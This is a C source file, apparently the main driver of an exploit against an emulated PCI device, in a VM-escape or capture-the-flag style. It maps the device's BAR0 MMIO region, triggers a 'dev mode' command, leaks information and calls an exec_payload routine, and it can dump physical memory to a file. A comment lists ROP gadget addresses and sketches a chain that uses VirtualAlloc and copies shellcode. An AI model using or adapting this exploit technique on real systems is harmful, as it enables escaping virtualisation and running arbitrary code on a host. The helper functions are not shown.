#include <stdio.h>
#include <stdlib.h>

#include "mmio_mgt.h"
#include "pci_mgt.h"
#include "log.h"

#define DEBUG

void *mmio_area = NULL;

/*
 * GetProcAddress
 * LoadLibrary
 * CreateFileW
 * 
 * VirtualAlloc
 * 
 * 
 * 0x180010b9c : pop rcx ; ret
 * 0x180010abd : pop rdx ; ret
 * 0x18002e53d : pop r8 ; add rsp, 0x50 ; pop rbx ; ret
 * 0x00000001800011fd : pop rax ; ret
 * 0x0000000180010abd : pop rdx ; ret
 * 0x00000001800b6fc1 : cmove r9, rdx ; mov rax, r9 ; ret
 * 0x0000000180045c9f : xor rax, rax ; ret
 * 
 * 
 * ROP chain:
 *    - Call virtual alloc with
 *    - Copy the shellcode to the 
 */



/*
 * Small test to dump the whole MMIO buffer.
 */
static int test_dump_mmio_buffer(void)
{
    printf("test_dump_mmio_buffer:\n");
    hexdump(mmio_area, MMIO_BUFFER_SIZE);
    return 0;
}

/*
 * Small test to dump the whole MMIO buffer.
 */
static int test_leak(void)
{
    leak_info();
    return 0;
}

static int test_exec_payload(void)
{
    exec_payload();
    return 0;
}

/*
 * Small test to dump the whole MMIO buffer.
 */
static int test_setup_test_job(void)
{
    // printf("test_setup_test_job:\n");
    // hexdump(mmio_area, MMIO_BUFFER_SIZE);
    leak_info();
    // printf("Without flush\n");
    // hexdump(mmio_area, MMIO_BUFFER_SIZE);
    return 0;
}

/*
 * Do all tests.
 *
 * Parameters:
 *      None
 * 
 * Return value:
 *      0 or error code.
 */
static int test_all(void)
{
    // test_dump_mmio_buffer();
    // test_setup_test_job();
    test_leak();
    test_exec_payload();
    // test_exec_payload();
}

void map_and_dump(void)
{
    void *ptr = NULL;
    if (map_physical(&ptr, 0x180000, 0x80000) < 0)
    {
        printf("Failed to map physical\n");
        return;
    }

    dump_to_file("/tmp/encrypt.exe", ptr, 0x80000);
}

/*
 * Main function.
 *
 * Parameters:
 *      None
 * 
 * Return value:
 *      0 or error code.
 */
int main(int argc, char *argv[])
{
    int res = 0;

    if (init_mm_driver() < 0)
    {
        printf("Failed to init mm_driver\n");
        return -1;
    }

    if (argc > 1)
    {
        map_and_dump();
        fini_mm_driver();
        return 0;
    }

    if (map_bar0_buffer(&mmio_area) < 0)
    {
        printf("Failed to map BAR0\n");
        return -1;
    }

    printf("Switching to dev mode\n");
    pci_send_switch_to_devmode();

#ifdef DEBUG
    test_all();
#endif

    fini_mm_driver();

    return 0;
}